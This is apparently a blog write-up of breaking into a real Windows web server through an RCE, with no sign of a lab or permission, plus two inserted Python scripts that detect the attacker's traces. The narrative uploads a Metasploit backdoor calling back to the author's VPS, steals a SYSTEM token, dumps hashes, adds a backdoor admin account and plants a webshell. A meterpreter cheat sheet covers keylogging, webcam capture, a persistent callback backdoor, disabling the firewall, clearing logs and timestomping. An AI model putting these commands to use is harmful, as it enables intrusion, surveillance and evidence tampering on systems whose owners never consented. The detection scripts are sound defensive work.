Record of an imperfect post-penetration
For some reason, I don't have a screenshot.
All right, let's start!
Background
I found a website that had an RCE, so I could execute any command on its server, but I didn't find the website root directory!
Recon & collect information
First, I ran the "whoami" command; it showed administrator permissions, so I could judge that the OS is Windows. Of course, you can also judge it another way. That's not the point.
And I ran the "dir" command to view the files in the current directory; at the same time, I could also learn my current path, but it was not the website root directory.
So I couldn't upload my webshell to the website. I tried to upload some text, and it succeeded. Then I ran the "tasklist" command to check whether the server had anti-virus software; luckily, it didn't! So I tried to upload my msf backdoor to this server and execute it. Everything went well! My VPS got a session. That would be very convenient for my next operation.
Next, continue to collect information.
I ran "getuid" and found that I was not SYSTEM. I tried "getsystem", but it failed. What could I do? First, I ran the "ps" command to find some system processes, then ran "steal_token pid" to inject into the process, so I got SYSTEM!
And then I ran "run hashdump" to get user passwords. I got the encrypted passwords of several users, and I found a hidden user. I tried to decrypt them, but failed.
So I ran the following commands to add a user and join the administrators group:
net user test admin@admin /add
net localgroup administrators test /add
It's OK!
And I could use "sysinfo", "ipconfig" and "netstat -ano" to find more information; that is more basic, so I won't say much.
I tried to connect to the remote desktop, but failed.
So far, I know the following information:
1. Its OS is Windows 2012 R2.
2. It has port 3389 open.
3. It has an intranet.
4. No AV.
etc..... -_-|| I forget.....
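Added example (not from the original post): the two "net" commands above leave a characteristic pair of Windows Security events, 4720 (user account created) followed almost immediately by 4732 (member added to a security-enabled local group). The script below correlates those two IDs over a constructed, simplified log export. The key=value field names are assumed for readability; in real 4732 events the group name sits in TargetUserName and the member in MemberName, so map the fields accordingly when pointing this at an actual export. It also flags new account names ending in "$", the hidden-account naming trick, which legitimately occurs for domain computer accounts, so tune that rule per environment.

```python
"""Correlate Windows Security events 4720 and 4732 to spot a freshly created local admin.
Added example, not code from the original post. Event IDs are real; the log lines and the
key=value layout below are constructed for the example."""
import re
from datetime import datetime, timedelta

# Constructed sample export. Layout assumed: "<date> <time> <event id> key=value ...".
SAMPLE_EVENTS = """\
2021-11-11 10:20:01 4624 TargetUserName=webapp LogonType=5
2021-11-11 10:21:30 4720 TargetUserName=test SubjectUserName=SYSTEM
2021-11-11 10:21:31 4732 TargetUserName=test GroupName=Administrators SubjectUserName=SYSTEM
2021-11-11 11:05:12 4720 TargetUserName=backup$ SubjectUserName=Administrator
2021-11-12 09:00:00 4720 TargetUserName=jsmith SubjectUserName=HelpDesk
2021-11-12 15:30:00 4732 TargetUserName=jsmith GroupName=Administrators SubjectUserName=HelpDesk
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\d{4}) (.*)$")


def parse_events(text):
    """Turn the constructed export into a list of dicts: time, id, plus the key=value fields."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip blank or malformed lines
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        fields = dict(kv.split("=", 1) for kv in m.group(3).split())
        events.append({"time": ts, "id": int(m.group(2)), **fields})
    return events


def find_new_local_admins(events, window=timedelta(minutes=10)):
    """Return (rule, user, time) findings.

    created_then_admin: a 4720 for the user followed by a 4732 into Administrators within `window`.
    hidden_name: a 4720 whose account name ends in '$' (hidden-account trick; also normal for
                 domain computer accounts, so scope this rule to stand-alone servers).
    """
    created = {}   # user -> the 4720 event that created it
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        user = ev.get("TargetUserName", "")
        if ev["id"] == 4720:
            created[user] = ev
            if user.endswith("$"):
                findings.append(("hidden_name", user, ev["time"]))
        elif ev["id"] == 4732 and ev.get("GroupName") == "Administrators":
            c = created.get(user)
            if c is not None and ev["time"] - c["time"] <= window:
                findings.append(("created_then_admin", user, ev["time"]))
    return findings


if __name__ == "__main__":
    for rule, user, when in find_new_local_admins(parse_events(SAMPLE_EVENTS)):
        print(f"{when} {rule}: {user}")
```

The window matters: a help-desk account that is created in the morning and promoted hours later (jsmith in the sample) is not flagged, while an account created and promoted one second apart (the pattern the two commands above produce) is.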
Permission maintenance
I tried to upload a webshell to the root directory of the website, but I didn't know the root directory.
When I viewed the website, I found it had a special file named 1.txt,
so I could run the "search -f 1.txt" command to find the root directory, and succeeded.
Then I uploaded my webshell using "upload /xx/xxx/shell.jsp /xx/xx/xx/", and succeeded.
I used AntSword to connect to my webshell, and succeeded.
But then the server shut down, so my action was over.
All right, I'll summarize the rest in Chinese.
Commonly used meterpreter commands:
background -> send the session to the background.
cat -> view a file.
del -> delete a file.
upload -> upload a file.
download -> download a file.
edit -> edit a file.
search -f xxx -> search for a file.
enumdesktops -> user logon count.
sysinfo -> system information.
keyscan_start -> start keystroke logging.
keyscan_dump -> show the captured keystrokes.
keyscan_stop -> stop logging.
migrate <pid> -> process migration, or bind to a process (usable for privilege escalation and persistence).
steal_token <pid> -> token stealing (privilege escalation).
clearev -> clear the event logs.
webcam_snap -i 1 -v false -> capture a webcam frame.
run hashdump -> get password hashes.
run keylogrecorder -> keystroke logging.
run persistence -X -i 5 -p 4444 -r vps_ip -> persistent backdoor, starts at boot, reconnects every 5 s.
run getgui -e -> enable remote desktop.
netsh advfirewall set allprofiles state off -> turn off the firewall.
timestomp -v test.txt -> view the target file's MACE times.
timestomp text.txt -c "11/11/2021 10:22:14" -> change the file's creation time (anti-forensics).
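Added example (not from the original post): the last two list items rewrite a file's creation time, and that rewrite only touches the $STANDARD_INFORMATION attribute on NTFS. Two well-known forensic heuristics catch it: the $FILE_NAME creation time ends up later than the $STANDARD_INFORMATION one, and a value set at one-second granularity leaves the sub-second part all zero. The script below applies both to constructed MFT-style records; a real check would read the two attributes from the MFT with a parser and feed them through the same comparisons. Both rules produce false positives (moves and some copy tools also leave odd timestamps), so treat a hit as a lead, not proof.

```python
"""Two heuristics for spotting timestomped files on NTFS. Added example, not code from the
original post. The records are constructed; SI = $STANDARD_INFORMATION (what timestomp-style
tools rewrite), FN = $FILE_NAME (set by the kernel and not rewritten by those tools)."""
from datetime import datetime

FMT = "%Y-%m-%d %H:%M:%S.%f"

# Constructed MFT-style records. Python microseconds stand in for FILETIME's 100 ns ticks; the
# zero-sub-second heuristic works the same way at either resolution.
SAMPLE_RECORDS = [
    {"path": r"C:\inetpub\wwwroot\1.txt",           # untouched file: SI == FN, real sub-seconds
     "si_created": "2021-11-11 10:22:14.381204",
     "fn_created": "2021-11-11 10:22:14.381204"},
    {"path": r"C:\inetpub\wwwroot\shell.jsp",       # SI pushed back to a whole second, FN kept the truth
     "si_created": "2021-11-11 10:22:14.000000",
     "fn_created": "2021-11-20 08:13:42.731900"},
    {"path": r"C:\Windows\Temp\test.txt",           # only the sub-second rule fires
     "si_created": "2021-11-20 08:14:00.000000",
     "fn_created": "2021-11-20 08:14:00.000000"},
]


def check_timestomp(record):
    """Return the list of heuristic names that fire for one record (empty if none)."""
    si = datetime.strptime(record["si_created"], FMT)
    fn = datetime.strptime(record["fn_created"], FMT)
    reasons = []
    if si < fn:
        # A file cannot be created before the kernel recorded its name; SI was edited.
        reasons.append("si_before_fn")
    if si.microsecond == 0:
        # Tools that accept "MM/DD/YYYY HH:MM:SS" cannot supply sub-second bits.
        reasons.append("zero_subsecond")
    return reasons


def scan(records):
    """Map path -> fired heuristics, keeping only records with at least one hit."""
    results = {r["path"]: check_timestomp(r) for r in records}
    return {path: reasons for path, reasons in results.items() if reasons}


if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_RECORDS).items():
        print(f"{path}: {', '.join(reasons)}")
```

On a live system the same comparison can be extended to the modified and MFT-changed timestamps; creation time is shown here because that is the field the list item above rewrites.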
Well, that's it! Next time I will talk about intranet penetration!